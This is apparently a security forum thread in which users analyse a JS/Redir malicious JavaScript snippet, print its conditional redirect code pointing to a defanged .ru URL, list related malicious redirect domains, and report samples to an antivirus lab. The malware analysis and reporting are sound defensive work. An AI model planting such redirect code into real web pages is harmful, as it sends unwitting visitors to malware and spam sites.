Is this JS/Redir being detected?

See: http://zulu.zscaler.com/submission/show/d2d0e1eafe344a5f4dc740e86d9c7e7a-1358354577
Detected via a file viewer was the following JS/Redir code
See code:

 <  sc​ript >
10: var1=49;
11: var2=var1;
12: if(var1==var2) {document.location="hxtp://dozakialko.ru:8080/forum/links/column.php";}
13: < / sc​ript > 

Read on this: http://blog.dynamoo.com/2013/01/american-express-spam-dozakialkoru.html (link post: Posted by Conrad Longmore)
Please wait a moment … You will be forwarded.
Internet Explorer and Mozilla Firefox compatible only
See this report: http://wepawet.iseclab.org/view.php?hash=90855d4318147b4c3a78374383b0e147&type=js

reported to virus AT avast dot com

polonus

Hi Polonus,

This technique is used with various URLs. A search on Google included:

hXtp://ukr.net
hXtp://topsearch10.com/search.php?aid=62756&q=home+jobs
hXtp://popka-super.ru
hXtp://realstarsearch.com/search.php?q=runescape+automine
hXtp://zaebiz.info
hXtp://global-advers.com/soft.php?aid=0153&d=2&product=XPA
hXtp://www.mp3sugar.com/?aff=2081
hXtp://evamendesochka.com/go.php?sid=9
hXtp://catalog--sites.info/sea
hXtp://yahhooo.info/search.php?q=ritalin&tpl=forbot

Do you see the pattern?
~!Donovan

not detected… will upload sample to avast lab :wink:

VirusTotal
https://www.virustotal.com/file/f4ff9fbb00a204237f0f3cf8b87cc63ceb105003910cda53eb46719f2cabb374/analysis/1358368480/

Hi !Donovan,

Reported this and the malcode pattern to virus AT avast dot com. The file viewer analysis was clear enough to detect the “If var1 Equals var2 Then Redirect!” pattern. Another one here: htxp://cs.gamegarant.by/upload.htm
Thanks for the extended analysis on WAR: http://websiteanalystsresource.wordpress.com/2013/01/16/if-var1-equals-var2-then-redirect/ (link article author !Donovan),

polonus

There more variants on the same theme, see comparison operators in PHP: http://www.developphp.com/view_lesson.php?v=207 (link author = Author: Adam Khoury ) and the malcode could also be combined with particular escape characters and through malicious spacing code…

polonus

Hi Polonus,

We have a topic from 2012 which includes similar malcode: http://forum.avast.com/index.php?topic=110553.0

~!Donovan

Hi !Donovan,

Good you alerted us to that. Seems the JS/Redir variants have been with us since 2009. Those I reported in this thread appeared on VirusWatch Archives and then I just fed the uri’s to redleg’s fileviewer as I later reported to virus AT avast dot com. In a NoScript protected browser JS/Redir stands out because permission is asked to go to the conditional redirect site, which of course we should not allow. The redirect is spam click related malcode…

polonus

the URL hhac.net/upload.htm is now down…